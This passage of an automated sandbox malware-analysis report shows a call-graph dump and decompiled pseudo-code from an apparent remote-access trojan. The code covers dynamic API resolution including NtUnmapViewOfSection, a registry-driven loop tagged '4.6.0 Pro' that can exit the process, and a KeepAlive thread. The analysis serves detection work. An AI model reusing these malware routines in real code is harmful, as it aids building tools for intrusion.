4398be _strftime 47353->47346 47365 43eead 20 API calls _free 47353->47365 47356 43a322 47355->47356 47357 43a30f 47355->47357 47356->47343 47366 43eead 20 API calls _free 47357->47366 47359 43a314 _strftime 47359->47343 47360->47346 47361->47348 47362->47348 47363->47349 47364->47353 47365->47346 47366->47359 47373 401f90 47367->47373 47369 402efe 47370 402035 11 API calls 47369->47370 47371 402f0d 47370->47371 47371->46897 47372->46900 47374 4025d0 28 API calls 47373->47374 47375 401f9d 47374->47375 47375->47369 47377 401f6e 47376->47377 47390 402232 47377->47390 47379 401f79 47379->46910 47380->46925 47395 403202 47381->47395 47383 403002 47399 403242 47383->47399 47386->46935 47387->46930 47388->46932 47389->46930 47391 40228c 47390->47391 47392 40223c 47390->47392 47391->47379 47392->47391 47394 402759 11 API calls std::_Deallocate 47392->47394 47394->47391 47396 40320e 47395->47396 47405 4035f8 47396->47405 47398 40321b 47398->47383 47400 40324e 47399->47400 47401 402232 11 API calls 47400->47401 47402 403268 47401->47402 47431 402316 47402->47431 47406 403606 47405->47406 47407 403624 47406->47407 47408 40360c 47406->47408 47410 40363c 47407->47410 47411 40367e 47407->47411 47416 403686 28 API calls 47408->47416 47415 403622 47410->47415 47417 4027c6 47410->47417 47428 402884 22 API calls std::_Xinvalid_argument 47411->47428 47415->47398 47416->47415 47418 4027cf 47417->47418 47419 402831 47418->47419 47420 4027d9 47418->47420 47430 402884 22 API calls std::_Xinvalid_argument 47419->47430 47423 4027e2 47420->47423 47424 4027f5 47420->47424 47429 402aca 28 API calls __EH_prolog 47423->47429 47426 4027f3 47424->47426 47427 402232 11 API calls 47424->47427 47426->47415 47427->47426 47429->47426 47432 402327 47431->47432 47433 402232 11 API calls 47432->47433 47434 4023a7 47433->47434 47434->46936 47436 404166 47435->47436 47437 402232 11 API calls 47436->47437 47438 404171 47437->47438 47446 40419c 47438->47446 47441 4042dc 47458 404333 47441->47458 47443 4042ea 47444 403242 11 API calls 47443->47444 47445 4042f9 47444->47445 47445->46949 47447 4041a8 47446->47447 47450 4041b9 47447->47450 47449 40417c 47449->47441 47451 4041c9 47450->47451 47452 4041e6 47451->47452 47453 4041cf 47451->47453 47454 4027c6 28 API calls 47452->47454 47457 404247 28 API calls 47453->47457 47456 4041e4 47454->47456 47456->47449 47457->47456 47459 40433f 47458->47459 47462 404351 47459->47462 47461 40434d 47461->47443 47463 40435f 47462->47463 47464 404365 47463->47464 47465 40437e 47463->47465 47528 4034c6 28 API calls 47464->47528 47466 402868 22 API calls 47465->47466 47467 404386 47466->47467 47470 4043f9 47467->47470 47471 40439f 47467->47471 47469 40437c 47469->47461 47529 402884 22 API calls std::_Xinvalid_argument 47470->47529 47471->47469 47473 4027c6 28 API calls 47471->47473 47473->47469 47528->47469 47530->46963 47532 40ae86 47531->47532 47533 402232 11 API calls 47532->47533 47534 40ae91 47533->47534 47537 40aea6 47534->47537 47536 40aea0 47536->46973 47538 40aee0 47537->47538 47539 40aeb2 47537->47539 47544 402884 22 API calls std::_Xinvalid_argument 47538->47544 47541 4027c6 28 API calls 47539->47541 47543 40aebc 47541->47543 47543->47536 47551 43939a 47545->47551 47549 412ba1 47548->47549 47550 412b77 RegSetValueExA RegCloseKey 47548->47550 47549->46981 47550->47549 47554 43931b 47551->47554 47553 4016ed 47553->46983 47555 43932a 47554->47555 47556 43933e 47554->47556 47560 43eead 20 API calls _free 47555->47560 47559 43932f __alldvrm _strftime 47556->47559 47561 4471d7 11 API calls 2 library calls 47556->47561 47559->47553 47560->47559 47561->47559 47565 41a454 ctype ___scrt_get_show_window_mode 47562->47565 47563 402073 28 API calls 47564 414290 47563->47564 47564->46990 47565->47563 47566->47007 47568 414249 getaddrinfo WSASetLastError 47567->47568 47569 41423f 47567->47569 47568->47034 47686 4140cd 29 API calls ___std_exception_copy 47569->47686 47571 414244 47571->47568 47573 404826 socket 47572->47573 47574 404819 47572->47574 47576 404840 CreateEventW 47573->47576 47577 404822 47573->47577 47687 40487e WSAStartup 47574->47687 47576->47034 47577->47034 47578 40481e 47578->47573 47578->47577 47580 404f45 47579->47580 47585 404fc6 47579->47585 47581 404f4e 47580->47581 47582 404fa0 CreateEventA 47580->47582 47583 404f5d GetLocalTime 47580->47583 47581->47582 47582->47585 47688 41a6e9 28 API calls 47583->47688 47585->47034 47586 404f71 47689 4052dd 28 API calls 47586->47689 47595 4049fb 47594->47595 47596 4048ce 47594->47596 47597 40495e 47595->47597 47598 404a01 WSAGetLastError 47595->47598 47596->47597 47603 4052fe 28 API calls 47596->47603 47618 404903 47596->47618 47597->47034 47598->47597 47599 404a11 47598->47599 47600 404912 47599->47600 47601 404a16 47599->47601 47609 402073 28 API calls 47600->47609 47701 41b45a 30 API calls 47601->47701 47606 4048ef 47603->47606 47605 40490b 47605->47600 47612 404921 47605->47612 47607 402073 28 API calls 47606->47607 47610 4048fe 47607->47610 47608 404a20 47702 4052dd 28 API calls 47608->47702 47613 404a60 47609->47613 47614 41a04a 79 API calls 47610->47614 47620 404930 47612->47620 47621 404967 47612->47621 47616 402073 28 API calls 47613->47616 47614->47618 47617 404a6f 47616->47617 47622 41a04a 79 API calls 47617->47622 47690 41f56b 27 API calls 47618->47690 47625 402073 28 API calls 47620->47625 47698 42034b 53 API calls 47621->47698 47622->47597 47628 40493f 47625->47628 47627 40496f 47630 4049a4 47627->47630 47631 404974 47627->47631 47632 402073 28 API calls 47628->47632 47700 41f711 28 API calls 47630->47700 47635 402073 28 API calls 47631->47635 47636 40494e 47632->47636 47639 404983 47635->47639 47637 41a04a 79 API calls 47636->47637 47640 404953 47637->47640 47638 4049ac 47641 4049d9 CreateEventW CreateEventW 47638->47641 47643 402073 28 API calls 47638->47643 47642 402073 28 API calls 47639->47642 47691 41f5ab 47640->47691 47641->47597 47644 404992 47642->47644 47646 4049c2 47643->47646 47647 41a04a 79 API calls 47644->47647 47648 402073 28 API calls 47646->47648 47649 404997 47647->47649 47650 4049d1 47648->47650 47699 41f9bd 51 API calls 47649->47699 47652 41a04a 79 API calls 47650->47652 47653 4049d6 47652->47653 47653->47641 47655 404e20 SetEvent CloseHandle 47654->47655 47656 404e37 closesocket 47654->47656 47657 404eb8 47655->47657 47658 404e44 47656->47658 47657->47034 47659 404e53 47658->47659 47660 404e5a 47658->47660 47705 4050c4 83 API calls 47659->47705 47662 404e6c WaitForSingleObject 47660->47662 47663 404eae SetEvent CloseHandle 47660->47663 47664 41f5ab 3 API calls 47662->47664 47663->47657 47665 404e7b SetEvent WaitForSingleObject 47664->47665 47666 41f5ab 3 API calls 47665->47666 47667 404e93 SetEvent FindCloseChangeNotification FindCloseChangeNotification 47666->47667 47667->47663 47668->47034 47669->47034 47671->47034 47672->47034 47673->47034 47674->47034 47675->47060 47676->47060 47677->47060 47678->47060 47679->47060 47680->47060 47681->47060 47682->47060 47683->47060 47684->47060 47685->47060 47686->47571 47687->47578 47688->47586 47690->47605 47692 41f5b3 47691->47692 47693 41d01c 47691->47693 47692->47597 47694 41d02a 47693->47694 47703 41c166 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47693->47703 47704 41cd4c DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47694->47704 47697 41d031 47698->47627 47699->47640 47700->47638 47701->47608 47703->47694 47704->47697 47705->47660 47706->47103 47707->47129 47708->47128 47709->47117 47710->47121 47711->47127 47712->47157 47717 40ed05 47715->47717 47716 412831 3 API calls 47716->47717 47717->47716 47718 40eda9 47717->47718 47720 40ed99 Sleep 47717->47720 47737 40ed37 47717->47737 47745 4086d0 28 API calls 47718->47745 47720->47717 47723 41a7b9 28 API calls 47723->47737 47724 40edb4 47725 41a7b9 28 API calls 47724->47725 47726 40edc0 47725->47726 47746 412afc 14 API calls 47726->47746 47729 401ee9 11 API calls 47729->47737 47730 40edd3 47731 401ee9 11 API calls 47730->47731 47733 40eddf 47731->47733 47732 402073 28 API calls 47732->47737 47734 402073 28 API calls 47733->47734 47735 40edf0 47734->47735 47738 412a57 14 API calls 47735->47738 47736 412a57 14 API calls 47736->47737 47737->47720 47737->47723 47737->47729 47737->47732 47737->47736 47742 40c5a4 111 API calls ___scrt_get_show_window_mode 47737->47742 47743 4086d0 28 API calls 47737->47743 47744 412afc 14 API calls 47737->47744 47739 40ee03 47738->47739 47747 411d93 TerminateProcess WaitForSingleObject 47739->47747 47741 40ee0b ExitProcess 47743->47737 47744->47737 47745->47724 47746->47730 47747->47741 47748 433180 47753 433452 SetUnhandledExceptionFilter 47748->47753 47750 433185 pre_c_initialization 47754 443e4c 20 API calls 2 library calls 47750->47754 47752 433190 47753->47750 47754->47752 47755 425556 47760 4255d3 send 47755->47760 47761 4254e7 47767 4255bc recv 47761->47767 47768 44202d 47769 442036 47768->47769 47770 44204f 47768->47770 47771 44203e 47769->47771 47775 4420b5 47769->47775 47773 442046 47773->47771 47786 442382 22 API calls 2 library calls 47773->47786 47776 4420c1 47775->47776 47777 4420be 47775->47777 47787 44dc5d GetEnvironmentStringsW 47776->47787 47777->47773 47780 4420ce 47796 445002 20 API calls _free 47780->47796 47783 442103 47783->47773 47784 4420d9 47795 445002 20 API calls _free 47784->47795 47786->47770 47788 4420c8 47787->47788 47789 44dc71 47787->47789 47788->47780 47794 4421da 26 API calls 3 library calls 47788->47794 47797 444a38 47789->47797 47791 44dc85 ctype 47804 445002 20 API calls _free 47791->47804 47793 44dc9f FreeEnvironmentStringsW 47793->47788 47794->47784 47795->47780 47796->47783 47798 444a76 47797->47798 47799 444a46 ___crtLCMapStringA 47797->47799 47806 43eead 20 API calls _free 47798->47806 47799->47798 47801 444a61 RtlAllocateHeap 47799->47801 47805 441850 7 API calls 2 library calls 47799->47805 47801->47799 47802 444a74 47801->47802 47802->47791 47804->47793 47805->47799 47806->47802 47807 41c8c8 47808 41c8dd ctype ___scrt_get_show_window_mode 47807->47808 47820 41cae0 47808->47820 47826 4317cf 21 API calls new 47808->47826 47811 41caf1 47814 41ca94 47811->47814 47822 4317cf 21 API calls new 47811->47822 47812 41ca8d ___scrt_get_show_window_mode 47812->47814 47827 4317cf 21 API calls new 47812->47827 47816 41cb2a ___scrt_get_show_window_mode 47816->47814 47823 431e55 47816->47823 47818 41caba ___scrt_get_show_window_mode 47818->47814 47828 4317cf 21 API calls new 47818->47828 47820->47814 47821 41c46d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 47820->47821 47821->47811 47822->47816 47829 431d74 47823->47829 47825 431e5d 47825->47814 47826->47812 47827->47818 47828->47820 47830 431d8d 47829->47830 47833 431d83 47829->47833 47830->47833 47835 4317cf 21 API calls new 47830->47835 47832 431dae 47832->47833 47836 432142 CryptAcquireContextA 47832->47836 47833->47825 47835->47832 47837 432163 CryptGenRandom 47836->47837 47838 43215e 47836->47838 47837->47838 47839 432178 CryptReleaseContext 47837->47839 47838->47833 47839->47838 47840 441ffe 47841 442007 47840->47841 47846 442020 47840->47846 47842 44200f 47841->47842 47847 44205c 47841->47847 47844 442017 47844->47842 47860 442303 22 API calls 2 library calls 47844->47860 47848 442065 47847->47848 47849 442068 47847->47849 47848->47844 47850 44d8d9 48 API calls 47849->47850 47851 44206f 47850->47851 47861 44dbda GetEnvironmentStringsW 47851->47861 47856 4420af 47856->47844 47857 442085 47874 445002 20 API calls _free 47857->47874 47859 44207a 47875 445002 20 API calls _free 47859->47875 47860->47846 47862 44dbf1 47861->47862 47872 44dc44 47861->47872 47865 44dbf7 WideCharToMultiByte 47862->47865 47863 442074 47863->47859 47873 442109 26 API calls 4 library calls 47863->47873 47864 44dc4d FreeEnvironmentStringsW 47864->47863 47866 44dc13 47865->47866 47865->47872 47867 444a38 ___crtLCMapStringA 21 API calls 47866->47867 47868 44dc19 47867->47868 47869 44dc20 WideCharToMultiByte 47868->47869 47870 44dc36 47868->47870 47869->47870 47876 445002 20 API calls _free 47870->47876 47872->47863 47872->47864 47873->47857 47874->47859 47875->47856 47876->47872 47877 42e1f8 47878 42e203 47877->47878 47879 42e217 47878->47879 47881 4317f9 47878->47881 47882 431804 47881->47882 47883 431808 47881->47883 47882->47879 47885 43f7dd 47883->47885 47886 444a86 47885->47886 47887 444a93 47886->47887 47888 444a9e 47886->47888 47889 444a38 ___crtLCMapStringA 21 API calls 47887->47889 47890 444aa6 47888->47890 47896 444aaf ___crtLCMapStringA 47888->47896 47894 444a9b 47889->47894 47898 445002 20 API calls _free 47890->47898 47892 444ab4 47899 43eead 20 API calls _free 47892->47899 47893 444ad9 RtlReAllocateHeap 47893->47894 47893->47896 47894->47882 47896->47892 47896->47893 47900 441850 7 API calls 2 library calls 47896->47900 47898->47894 47899->47894 47900->47896 47901 43a728 47903 43a734 _swprintf ___scrt_is_nonwritable_in_current_image 47901->47903 47902 43a742 47917 43eead 20 API calls _free 47902->47917 47903->47902 47905 43a76c 47903->47905 47912 444189 EnterCriticalSection 47905->47912 47907 43a747 ___scrt_is_nonwritable_in_current_image _strftime 47908 43a777 47913 43a818 47908->47913 47912->47908 47915 43a826 47913->47915 47914 43a782 47918 43a79f LeaveCriticalSection std::_Lockit::~_Lockit 47914->47918 47915->47914 47919 447fec 36 API calls 2 library calls 47915->47919 47917->47907 47918->47907 47919->47915 47920 40163e 47921 401646 47920->47921 47922 401649 47920->47922 47923 401688 47922->47923 47925 401676 47922->47925 47924 432df5 new 22 API calls 47923->47924 47926 40167c 47924->47926 47927 432df5 new 22 API calls 47925->47927 47927->47926

                Executed Functions

                Function 0041B4C9 Relevance: 117.4, APIs: 40, Strings: 27, Instructions: 143libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 100%
                			E0041B4C9() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t24;
				_Unknown_base(*)()* _t30;
				_Unknown_base(*)()* _t34;
				CHAR* _t42;
				CHAR* _t45;
				CHAR* _t46;
				CHAR* _t47;
				CHAR* _t48;
				CHAR* _t49;

				_t45 = "GetModuleFileNameExA";
				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, _t45);
				 *0x472b00 = _t2;
				if(_t2 == 0) {
					 *0x472b00 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t45);
				}
				_t46 = "GetModuleFileNameExW";
				 *0x472af8 = GetProcAddress(LoadLibraryA("Psapi.dll"), _t46);
				if( *0x472b00 == 0) {
					 *0x472af8 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t46);
				}
				_t6 = GetProcAddress(GetModuleHandleA("shcore"), "SetProcessDpiAwareness");
				 *0x472ad8 = _t6;
				if(_t6 == 0) {
					 *0x472adc = GetProcAddress(GetModuleHandleA("user32"), "SetProcessDpiAware");
				}
				GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				_t10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				_t47 = "kernel32";
				 *0x472aec = _t10;
				 *0x472af4 = GetProcAddress(GetModuleHandleA(_t47), "IsWow64Process");
				 *0x472afc = GetProcAddress(GetModuleHandleA(_t47), "GetComputerNameExW");
				 *0x472ae8 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				_t18 = GetProcAddress(GetModuleHandleA(_t47), "SetProcessDEPPolicy");
				_t48 = "user32";
				 *0x472ae0 = _t18;
				 *0x472ad0 = GetProcAddress(GetModuleHandleA(_t48), "EnumDisplayDevicesW");
				 *0x472ad4 = GetProcAddress(GetModuleHandleA(_t48), "EnumDisplayMonitors");
				_t24 = GetProcAddress(GetModuleHandleA(_t48), "GetMonitorInfoW");
				_t49 = "kernel32.dll";
				 *0x472b18 = _t24;
				 *0x472b08 = GetProcAddress(GetModuleHandleA(_t49), "GetSystemTimes");
				 *0x472b14 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				_t30 = GetProcAddress(LoadLibraryA(_t49), "GetConsoleWindow");
				_t42 = "ntdll";
				 *0x472b0c = _t30;
				 *0x472b04 = GetProcAddress(GetModuleHandleA(_t42), "NtSuspendProcess");
				_t34 = GetProcAddress(GetModuleHandleA(_t42), "NtResumeProcess");
				 *0x472af0 = _t34;
				return _t34;
			}

















                0x0041b4d3
                0x0041b4de
                0x0041b4e7
                0x0041b4ef
                0x0041b4f6
                0x0041b503
                0x0041b503
                0x0041b508
                0x0041b51f
                0x0041b524
                0x0041b531
                0x0041b531
                0x0041b543
                0x0041b545
                0x0041b54c
                0x0041b55d
                0x0041b55d
                0x0041b56f
                0x0041b57e
                0x0041b585
                0x0041b58a
                0x0041b59b
                0x0041b5af
                0x0041b5bf
                0x0041b5c7
                0x0041b5ce
                0x0041b5d3
                0x0041b5e4
                0x0041b5f4
                0x0041b5fc
                0x0041b603
                0x0041b608
                0x0041b61a
                0x0041b62a
                0x0041b632
                0x0041b639
                0x0041b63e
                0x0041b649
                0x0041b657
                0x0041b65c
                0x0041b662

                APIs
                • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4DE
                • GetProcAddress.KERNEL32(00000000), ref: 0041B4E7
                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4FE
                • GetProcAddress.KERNEL32(00000000), ref: 0041B501
                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B513
                • GetProcAddress.KERNEL32(00000000), ref: 0041B516
                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B52C
                • GetProcAddress.KERNEL32(00000000), ref: 0041B52F
                • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040DEE5), ref: 0041B540
                • GetProcAddress.KERNEL32(00000000), ref: 0041B543
                • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040DEE5), ref: 0041B558
                • GetProcAddress.KERNEL32(00000000), ref: 0041B55B
                • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040DEE5), ref: 0041B56C
                • GetProcAddress.KERNEL32(00000000), ref: 0041B56F
                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040DEE5), ref: 0041B57B
                • GetProcAddress.KERNEL32(00000000), ref: 0041B57E
                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040DEE5), ref: 0041B590
                • GetProcAddress.KERNEL32(00000000), ref: 0041B593
                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040DEE5), ref: 0041B5A0
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5A3
                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040DEE5), ref: 0041B5B4
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5B7
                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040DEE5), ref: 0041B5C4
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5C7
                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040DEE5), ref: 0041B5D9
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5DC
                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040DEE5), ref: 0041B5E9
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5EC
                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040DEE5), ref: 0041B5F9
                • GetProcAddress.KERNEL32(00000000), ref: 0041B5FC
                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040DEE5), ref: 0041B60E
                • GetProcAddress.KERNEL32(00000000), ref: 0041B611
                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040DEE5), ref: 0041B61F
                • GetProcAddress.KERNEL32(00000000), ref: 0041B622
                • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040DEE5), ref: 0041B62F
                • GetProcAddress.KERNEL32(00000000), ref: 0041B632
                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040DEE5), ref: 0041B644
                • GetProcAddress.KERNEL32(00000000), ref: 0041B647
                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040DEE5), ref: 0041B654
                • GetProcAddress.KERNEL32(00000000), ref: 0041B657
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule$LibraryLoad
                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll$ntdll.dll$shcore$user32
                • API String ID: 551388010-626199206
                • Opcode ID: d2d1844e2719a9dcaac12d858f5210b20b1b817276e2085d58da0c67cb1bf55f
                • Instruction ID: 5a53dc12768b909e1e2e060ec693a1e80cbb19dbcc6530350e1da79dd032a68e
                • Opcode Fuzzy Hash: d2d1844e2719a9dcaac12d858f5210b20b1b817276e2085d58da0c67cb1bf55f
                • Instruction Fuzzy Hash: C441EEA0E407187AD620BFB65D49E1B3E9CEA41B547110837B508B3551FAFCA8908F6F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040ECEA Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 88sleepCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 56%
                			E0040ECEA() {
				signed int _v32;
				void* _t13;
				void* _t22;
				char* _t34;
				void* _t63;
				signed int _t64;
				void* _t66;
				void* _t67;
				void* _t69;

				_t66 = (_t64 & 0xfffffff8) - 0x1c;
				_t34 = L"pth_unenc";
				while(1) {
					_v32 = _v32 & 0x00000000;
					_t52 = E00401F8B(0x473238); // executed
					E00412831(_t10, "override",  &_v32); // executed
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_t70 = _t66 - 0x1c;
						E004086D0(_t34, _t66 - 0x1c, _t52, __eflags, 0x473220);
						_push(_t34);
						E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v32, 0x473238)));
						E00401EE9();
						_push(1);
						E00402073(_t34, _t70 + 0x20 - 0x18, _t25, _t63, "4.6.0 Pro");
						_push("v");
						E00412A57(0x473238, E00401F8B(0x473238));
						E00411D93();
						ExitProcess(0);
					}
					_t77 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8); // executed
						continue;
					}
					E0040C5A4();
					L5:
					_t67 = _t66 - 0x1c;
					E004086D0(_t34, _t67, _t52, _t77, 0x473220);
					_push(_t34);
					E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v32, 0x473238)));
					E00401EE9();
					_push(1);
					_t69 = _t67 + 0x20 - 0x18;
					E00402073(_t34, _t69, _t16, _t63, "4.6.0 Pro");
					_push("v");
					E00412A57(0x473238, E00401F8B(0x473238));
					_t66 = _t69 + 0x20;
					goto L6;
				}
			}












                0x0040ecf0
                0x0040ed00
                0x0040ed05
                0x0040ed05
                0x0040ed1b
                0x0040ed1d
                0x0040ed28
                0x0040ed2b
                0x00000000
                0x00000000
                0x0040ed2d
                0x0040ed30
                0x0040eda9
                0x0040edaf
                0x0040edb4
                0x0040edce
                0x0040edda
                0x0040eddf
                0x0040edeb
                0x0040edf0
                0x0040edfe
                0x0040ee06
                0x0040ee0d
                0x0040ee0d
                0x0040ed32
                0x0040ed35
                0x0040ed99
                0x0040ed9e
                0x00000000
                0x0040ed9e
                0x0040ed37
                0x0040ed3c
                0x0040ed3c
                0x0040ed42
                0x0040ed47
                0x0040ed61
                0x0040ed6d
                0x0040ed72
                0x0040ed74
                0x0040ed7e
                0x0040ed83
                0x0040ed91
                0x0040ed96
                0x00000000
                0x0040ed96

                APIs
                  • Part of subcall function 00412831: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                  • Part of subcall function 00412831: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                  • Part of subcall function 00412831: RegCloseKey.KERNELBASE(?), ref: 0041287A
                • Sleep.KERNELBASE(00000BB8), ref: 0040ED9E
                • ExitProcess.KERNEL32 ref: 0040EE0D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseExitOpenProcessQuerySleepValue
                • String ID: 2G$4.6.0 Pro$82G$override$pth_unenc
                • API String ID: 2281282204-2513004603
                • Opcode ID: 60a4a1d6a730d7149879e2aadf7621bba3f14efdd4f3bdf51e32d926518ea428
                • Instruction ID: 45cdfc5c20f0b08445f9514382da16a4fbbca6339717cc3b6e195a3b8059c3c5
                • Opcode Fuzzy Hash: 60a4a1d6a730d7149879e2aadf7621bba3f14efdd4f3bdf51e32d926518ea428
                • Instruction Fuzzy Hash: 2721DE31B0020127C608B6B79957AAF35999F80708F50447FF809AA2D7EEBD8A5583DF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404F31 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58timethreadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1172 404f31-404f3f 1173 404f45-404f4c 1172->1173 1174 404fca 1172->1174 1175 404f54-404f5b 1173->1175 1176 404f4e-404f52 1173->1176 1177 404fcc-404fd1 1174->1177 1178 404fa0-404fbd CreateEventA 1175->1178 1179 404f5d-404f9b GetLocalTime call 41a6e9 call 4052dd call 402073 call 41a04a call 401fb8 1175->1179 1176->1178 1181 404fc6-404fc8 1178->1181 1179->1178 1181->1177
                C-Code - Quality: 91%
                			E00404F31(void* __ecx, intOrPtr _a4, char _a8) {
				struct _SYSTEMTIME _v20;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t16;
				void* _t21;
				intOrPtr _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				if( *((char*)(__ecx + 0x5c)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t29 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x470d48;
					if( *0x470d48 != 0) {
						GetLocalTime( &_v20);
						_t16 = E0041A6E9(_t21,  &_v44, _t29);
						_t34 = _t33 - 0x18;
						E004052DD(_t21, _t33 - 0x18, "KeepAlive             | Enabled | Timeout: ", _t32, __eflags, _t16);
						E00402073(_t21, _t34 - 0x14, "KeepAlive             | Enabled | Timeout: ", _t32, "i");
						E0041A04A(_t21, _t29);
						E00401FB8();
					}
				} else {
					 *((char*)(__ecx + 0x7c)) = 1;
				}
				 *((intOrPtr*)(_t31 + 0x74)) = _t29;
				 *((char*)(_t31 + 0x5c)) = 1;
				 *((intOrPtr*)(_t31 + 0x60)) = CreateEventA(0, 0, 0, 0);
				CreateThread(0, 0, E00405130, _t31, 0, 0); // executed
				return 1;
			}













                0x00404f38
                0x00404f3f
                0x00404fca
                0x00000000
                0x00404fca
                0x00404f49
                0x00404f4c
                0x00404f54
                0x00404f5b
                0x00404f61
                0x00404f6c
                0x00404f71
                0x00404f7c
                0x00404f8b
                0x00404f90
                0x00404f9b
                0x00404f9b
                0x00404f4e
                0x00404f4e
                0x00404f4e
                0x00404fa0
                0x00404fa9
                0x00404fbd
                0x00404fc0
                0x00000000

                APIs
                • GetLocalTime.KERNEL32(?), ref: 00404F61
                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                • CreateThread.KERNELBASE ref: 00404FC0
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Create$EventLocalThreadTime
                • String ID: KeepAlive | Enabled | Timeout: $Cqt
                • API String ID: 2532271599-1719384028
                • Opcode ID: f44067441d12eeb199d79db0566863068f31dfe9cf37c331ee33c08da6605574
                • Instruction ID: 81ef762065af47e4dab8e296ef88b7c3b87c262db6361300a2954e924f939db2
                • Opcode Fuzzy Hash: f44067441d12eeb199d79db0566863068f31dfe9cf37c331ee33c08da6605574
                • Instruction Fuzzy Hash: D711E3719043816AC720AB769C0DE9BBFB89BD6710F04016FF44562282DAB89485CBBA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00432142 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00432142(HCRYPTPROV* __ecx, BYTE* __edx) {
				int _v12;
				int _t2;
				void* _t6;
				BYTE* _t9;
				long** _t10;

				_t10 = __ecx;
				_t9 = __edx;
